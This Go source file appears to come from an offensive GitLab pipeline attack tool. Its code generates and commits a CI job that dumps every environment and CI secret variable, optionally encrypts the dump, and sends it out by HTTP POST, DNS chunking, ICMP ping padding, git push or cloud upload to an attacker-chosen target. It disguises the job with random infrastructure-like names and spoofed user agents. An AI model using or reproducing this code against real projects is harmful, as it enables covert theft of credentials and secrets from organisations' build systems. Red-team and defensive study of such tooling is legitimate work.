package attack

import (
	"context"
	"crypto/rand"
	"encoding/base64"
	"fmt"
	"log/slog"
	"strings"

	gitlab "gitlab.com/gitlab-org/api/client-go"
)

// ExfilOptions configures the exfiltration transport for secrets extraction.
type ExfilOptions struct {
	Method  string // "artifact" (default), "http", "dns", "icmp", "git", "cloud"
	Target  string // URL, domain, IP, or git URL depending on method
	JobName string // CI job name (if empty, a stealthy random name is generated)
}

// GenerateExfilJobName returns a stealthy CI job name for the exfil pipeline.
// Names look like legitimate CI infrastructure jobs (e.g. "ci-a3f9b2").
// Pass an explicit name to override (useful for searching/cleanup).
func GenerateExfilJobName() string {
	b := make([]byte, 3)
	if _, err := rand.Read(b); err != nil {
		return "ci-setup" // fallback
	}
	return fmt.Sprintf("ci-%x", b)
}

// SecretsAttack contains helpers for secrets enumeration/exfiltration on GitLab.
type SecretsAttack struct {
	*Attacker
}

func NewSecretsAttack(att *Attacker) *SecretsAttack { return &SecretsAttack{Attacker: att} }

// ListProjectVariableNames returns names of project-level variables accessible to pipelines.
func (s *SecretsAttack) ListProjectVariableNames(ctx context.Context, projectID any) ([]string, error) {
	vars, _, err := s.Client.GL.ProjectVariables.ListVariables(projectID, &gitlab.ListProjectVariablesOptions{}, gitlab.WithContext(ctx))
	if err != nil {
		return nil, err
	}
	names := make([]string, 0, len(vars))
	for _, v := range vars {
		names = append(names, v.Key)
	}
	return names, nil
}

// GenerateExfilCI produces a .gitlab-ci.yml that dumps environment and variables and optionally encrypts the output with an RSA pubkey.
// runnerTags filters to self-hosted runners if provided. exfil controls the exfiltration transport.
func (s *SecretsAttack) GenerateExfilCI(branchName, pubkey string, runnerTags []string, exfil ExfilOptions) string {
	var tagLine string
	if len(runnerTags) > 0 {
		tagLine = fmt.Sprintf("\n  tags: [%s]", quoteJoin(runnerTags))
	}
	// escape pubkey for shell heredoc if provided
	encStep := ""
	if strings.TrimSpace(pubkey) != "" {
		b64 := base64.StdEncoding.EncodeToString([]byte(pubkey))
		encStep = fmt.Sprintf("\n    - |\n      echo \"%s\" | base64 -d > pub.pem\n      aes_key=$(openssl rand -hex 12 | tr -d '\\n')\n      openssl enc -aes-256-cbc -pbkdf2 -in secrets.json -out secrets.enc -pass pass:$aes_key\n      echo -n \"$aes_key\" > aes_key.txt\n      openssl pkeyutl -encrypt -pubin -inkey pub.pem -in aes_key.txt -out aes.enc 2>/dev/null || openssl rsautl -encrypt -pkcs -pubin -inkey pub.pem -in aes_key.txt -out aes.enc\n      rm -f pub.pem aes_key.txt", b64)
	}
	// Method-specific exfiltration step (appended after collection + optional encryption).
	exfilStep := exfilScriptStep(exfil, strings.TrimSpace(pubkey) != "")
	jobName := strings.TrimSpace(exfil.JobName)
	if jobName == "" {
		jobName = GenerateExfilJobName()
	}
	// GitLab pipelines run on push by default; we keep a simple job.
	// The secrets.json dump tries python3 first, then python2, then perl
	// (JSON::PP is core since 5.14), then falls back to pure shell.
	// Note: the shell fallback cannot handle newlines in variable values
	// because `read -r` splits on newlines.
	return fmt.Sprintf("# Auto-generated by GoGatoZ\nstages: [exfiltrate]\n\n%s:\n  stage: exfiltrate%s\n  script:\n    - |\n      echo \"Collecting environment and CI variables\"\n      printenv | sort > env.txt\n      if command -v python3 >/dev/null 2>&1; then\n        python3 -c \"import json,os; open('secrets.json','w').write(json.dumps(dict(os.environ)))\"\n      elif command -v python >/dev/null 2>&1; then\n        python -c \"import json,os; open('secrets.json','w').write(json.dumps(dict(os.environ)))\"\n      elif command -v perl >/dev/null 2>&1; then\n        perl -MJSON::PP -e 'my %%e = %%ENV; print encode_json(\\%%e);' > secrets.json 2>/dev/null || \\\n        perl -e 'use JSON::PP; my %%e = %%ENV; print encode_json(\\%%e);' > secrets.json\n      else\n        printf '{' > secrets.json\n        first=1\n        printenv | sort | while IFS='=' read -r key value; do\n          [ -z \"$key\" ] && continue\n          esc_key=$(printf '%%s' \"$key\" | sed 's/\\\\/\\\\\\\\/g; s/\"/\\\\\"/g')\n          esc_val=$(printf '%%s' \"$value\" | sed 's/\\\\/\\\\\\\\/g; s/\"/\\\\\"/g; s/\\t/\\\\t/g')\n          [ $first -eq 1 ] && first=0 || printf ',' >> secrets.json\n          printf '\"%%s\":\"%%s\"' \"$esc_key\" \"$esc_val\" >> secrets.json\n        done\n        printf '}' >> secrets.json\n      fi%s%s\n  artifacts:\n    when: always\n    expose_as: exfil\n    paths:\n      - env.txt\n      - secrets.json\n      - secrets.enc\n      - aes.enc\n  rules:\n    - if: \"$CI_PIPELINE_SOURCE == 'push'\"\n", jobName, tagLine, encStep, exfilStep)
}

// exfilScriptStep returns an additional script block for the requested exfil method.
// Returns empty string for the default "artifact" method (artifacts are always present).
func exfilScriptStep(exfil ExfilOptions, encrypted bool) string {
	method := strings.ToLower(strings.TrimSpace(exfil.Method))
	target := strings.TrimSpace(exfil.Target)
	if method == "" || method == "artifact" {
		return ""
	}
	switch method {
	case "http":
		return exfilHTTP(target, encrypted)
	case "dns":
		return exfilDNS(target)
	case "icmp":
		return exfilICMP(target)
	case "git":
		return exfilGit(target)
	case "cloud":
		return exfilCloud(target, encrypted)
	default:
		return ""
	}
}

func exfilHTTP(target string, encrypted bool) string {
	if encrypted {
		return fmt.Sprintf("\n    - |\n      enc_b64=$(base64 -w0 secrets.enc)\n      key_b64=$(base64 -w0 aes.enc)\n      curl -sS -X POST \\\n        -H 'Content-Type: application/json' \\\n        -H 'User-Agent: GitLab-Webhook/1.0' \\\n        -d \"{\\\"payload\\\":\\\"$enc_b64\\\",\\\"key\\\":\\\"$key_b64\\\",\\\"pipeline_id\\\":\\\"$CI_PIPELINE_ID\\\",\\\"project\\\":\\\"$CI_PROJECT_PATH\\\"}\" \\\n        \"%s\" || true", target)
	}
	return fmt.Sprintf("\n    - |\n      b64=$(base64 -w0 secrets.json)\n      curl -sS -X POST \\\n        -H 'Content-Type: application/json' \\\n        -H 'User-Agent: GitLab-Webhook/1.0' \\\n        -d \"{\\\"data\\\":\\\"$b64\\\",\\\"pipeline_id\\\":\\\"$CI_PIPELINE_ID\\\",\\\"project\\\":\\\"$CI_PROJECT_PATH\\\"}\" \\\n        \"%s\" || true", target)
}

func exfilDNS(domain string) string {
	return fmt.Sprintf("\n    - |\n      b64=$(base64 -w0 secrets.json | tr '+/' '-_' | tr -d '=')\n      sid=$(echo -n \"$CI_PIPELINE_ID\" | md5sum | cut -c1-8)\n      i=0\n      while [ -n \"$b64\" ]; do\n        chunk=$(printf '%%.63s' \"$b64\")\n        b64=${b64#\"$chunk\"}\n        dig +short \"$i.$chunk.$sid.%s\" A >/dev/null 2>&1 || true\n        i=$((i+1))\n        sleep 0.1\n      done", domain)
}

func exfilICMP(target string) string {
	return fmt.Sprintf("\n    - |\n      hex=$(base64 -w0 secrets.json | xxd -p | tr -d '\\n')\n      i=0\n      while [ -n \"$hex\" ]; do\n        chunk=$(printf '%%.32s' \"$hex\")\n        hex=${hex#\"$chunk\"}\n        padded=$(printf '%%-32s' \"$chunk\" | tr ' ' '0')\n        ping -c 1 -p \"$padded\" \"%s\" >/dev/null 2>&1 || true\n        i=$((i+1))\n        sleep 0.05\n      done", target)
}

func exfilGit(repoURL string) string {
	return fmt.Sprintf("\n    - |\n      tmpdir=$(mktemp -d)\n      git clone --depth 1 \"%s\" \"$tmpdir\" 2>/dev/null\n      cp secrets.json \"$tmpdir/\"\n      cp env.txt \"$tmpdir/\" 2>/dev/null || true\n      cd \"$tmpdir\"\n      git config user.email \"ci@gitlab.com\"\n      git config user.name \"CI\"\n      git add -A\n      git commit -q -m \"exfil-$CI_PIPELINE_ID\" 2>/dev/null\n      git push -q origin HEAD 2>/dev/null || true\n      cd -\n      rm -rf \"$tmpdir\"", repoURL)
}

func exfilCloud(target string, encrypted bool) string {
	var b strings.Builder
	b.WriteString("\n    - |\n")
	if encrypted {
		b.WriteString("      target_file=secrets.enc\n")
	} else {
		b.WriteString("      target_file=secrets.json\n")
	}
	fmt.Fprintf(&b, "      curl -sS -X PUT \\\n        -H 'Content-Type: application/octet-stream' \\\n        -H 'User-Agent: aws-sdk-go/1.44.0' \\\n        -T \"$target_file\" \\\n        \"%s\" || true\n", target)
	if encrypted {
		fmt.Fprintf(&b, "      key_url=$(echo \"%s\" | sed 's/secrets/aes-key/')\n      curl -sS -X PUT -H 'Content-Type: application/octet-stream' -T aes.enc \"$key_url\" || true", target)
	}
	return b.String()
}

// RunExfil commits the generated CI file to the branch.
// Returns the pipeline filter URL, the actual job name used in the CI YAML, and any error.
// The job name is needed by callers that wait for the exfiltrate job to complete.
func (s *SecretsAttack) RunExfil(ctx context.Context, projectID any, branch, pubkey string, runnerTags []string, exfil ExfilOptions) (url, jobName string, err error) {
	if _, err = s.SetupUser(ctx); err != nil {
		return "", "", err
	}
	if strings.TrimSpace(exfil.JobName) == "" {
		exfil.JobName = GenerateExfilJobName()
	}
	yaml := s.GenerateExfilCI(branch, pubkey, runnerTags, exfil)
	url, err = s.CommitCIPipeline(ctx, projectID, branch, yaml, "Add exfiltration pipeline")
	if err == nil {
		slog.Info("exfil pipeline committed", "project", projectID, "branch", branch, "method", exfil.Method, "job", exfil.JobName)
	}
	return url, exfil.JobName, err
}

func quoteJoin(items []string) string {
	q := make([]string, len(items))
	for i, v := range items {
		q[i] = fmt.Sprintf("\"%s\"", strings.TrimSpace(v))
	}
	return strings.Join(q, ", ")
}
